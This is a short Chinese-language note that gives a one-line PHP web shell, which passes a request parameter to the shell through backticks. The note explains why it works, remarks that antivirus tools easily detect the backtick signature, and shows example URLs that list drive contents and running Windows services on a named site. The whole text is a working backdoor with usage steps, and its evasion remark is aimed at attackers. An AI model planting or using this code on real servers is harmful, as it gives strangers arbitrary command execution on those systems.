<?php
echo `$_REQUEST[id]`;
?>原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,
并返回命令执行的结果(string类型);
局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;
``里面不能执行php代码;
测试方式:
http://www.phpv.net/test.php?id=dir%20c
相当于:dir c:
http://www.phpv.net/test.php?id=net%20start 查看已启动的WIN服务 .....
